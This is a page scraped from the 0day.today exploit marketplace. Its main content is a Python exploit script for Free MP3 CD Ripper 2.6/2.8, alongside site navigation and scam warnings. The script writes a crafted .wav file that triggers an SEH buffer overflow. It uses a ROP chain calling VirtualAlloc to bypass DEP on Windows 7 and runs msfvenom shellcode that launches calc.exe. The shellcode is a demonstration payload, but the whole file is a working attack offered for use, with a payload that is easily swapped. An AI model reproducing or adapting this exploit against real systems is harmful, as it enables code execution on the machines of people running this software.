0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow (W7 - DEP Bypass) Exploit
[#!/usr/bin/python
# credit to ThreatActor at CoreRed.com
# Tested on: Windows 7 Ultimate X64
# Added DEP Bypass to the exploit
# naxxo (head@gmail.com)
import struct
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x004103fe, # POP EAX # RETN [fcrip.exe]
0x004e91f4, # ptr to &VirtualAlloc() [IAT fcrip.exe]
0x00418ff8, # MOV EAX,DWORD PTR DS:[EAX] # RETN [fcrip.exe]
0x00446c97, # PUSH EAX # POP ESI # POP EBX # RETN [fcrip.exe]
0x41414141, # Filler (compensate)
0x6f4811f8, # POP EBP # RETN [vorbisfile.dll]
0x1000c5ce, # & push esp # ret [libFLAC.dll]
0x00415bfb, # POP EBX # RETN [fcrip.exe]
0x00000001, # 0x00000001-> ebx
0x00415828, # POP EDX # RETN [fcrip.exe]
0x00001000, # 0x00001000-> edx
0x10005f62, # POP ECX # RETN [libFLAC.dll]
0x00000040, # 0x00000040-> ecx
0x00409967, # POP EDI # RETN [fcrip.exe]
0x00412427, # RETN (ROP NOP) [fcrip.exe]
0x00494277, # POP EAX # RETN [fcrip.exe]
0x90909090, # nop
0x004c8dc0, # PUSHAD # RETN [fcrip.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
# msfvenom -p windows/exec CMD=calc.exe -f python -b '\x00\xff\x0a\x0d'
shellcode = ""
shellcode += "\xbf\xaa\x7e\xf4\xa0\xd9\xec\xd9\x74\x24\xf4\x5a\x33"
shellcode += "\xc9\xb1\x31\x83\xc2\x04\x31\x7a\x0f\x03\x7a\xa5\x9c"
shellcode += "\x01\x5c\x51\xe2\xea\x9d\xa1\x83\x63\x78\x90\x83\x10"
shellcode += "\x08\x82\x33\x52\x5c\x2e\xbf\x36\x75\xa5\xcd\x9e\x7a"
shellcode += "\x0e\x7b\xf9\xb5\x8f\xd0\x39\xd7\x13\x2b\x6e\x37\x2a"
shellcode += "\xe4\x63\x36\x6b\x19\x89\x6a\x24\x55\x3c\x9b\x41\x23"
shellcode += "\xfd\x10\x19\xa5\x85\xc5\xe9\xc4\xa4\x5b\x62\x9f\x66"
shellcode += "\x5d\xa7\xab\x2e\x45\xa4\x96\xf9\xfe\x1e\x6c\xf8\xd6"
shellcode += "\x6f\x8d\x57\x17\x40\x7c\xa9\x5f\x66\x9f\xdc\xa9\x95"
shellcode += "\x22\xe7\x6d\xe4\xf8\x62\x76\x4e\x8a\xd5\x52\x6f\x5f"
shellcode += "\x83\x11\x63\x14\xc7\x7e\x67\xab\x04\xf5\x93\x20\xab"
shellcode += "\xda\x12\x72\x88\xfe\x7f\x20\xb1\xa7\x25\x87\xce\xb8"
shellcode += "\x86\x78\x6b\xb2\x2a\x6c\x06\x99\x20\x73\x94\xa7\x06"
shellcode += "\x73\xa6\xa7\x36\x1c\x97\x2c\xd9\x5b\x28\xe7\x9e\x94"
shellcode += "\x62\xaa\xb6\x3c\x2b\x3e\x8b\x20\xcc\x94\xcf\x5c\x4f"
shellcode += "\x1d\xaf\x9a\x4f\x54\xaa\xe7\xd7\x84\xc6\x78\xb2\xaa"
shellcode += "\x75\x78\x97\xc8\x18\xea\x7b\x21\xbf\x8a\x1e\x3d"
junk = "A" * 3812
junk+= rop_chain + "\x90" * (308-len(rop_chain)-len(shellcode)) + shellcode
seh = "\xd8\x2a\x9d\x63" # 0x639d2ad8 : {pivot 1132 / 0x46c} : # ADD ESP,45C # XOR EAX,EAX # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [vorbis.dll] ** | {PAGE_EXECUTE_READ}
buffer = junk + seh + "\x90" * 800
file = "poc.wav"
f=open(file,"w")
f.write(buffer);
f.close();
# 0day.today [2024-11-15] #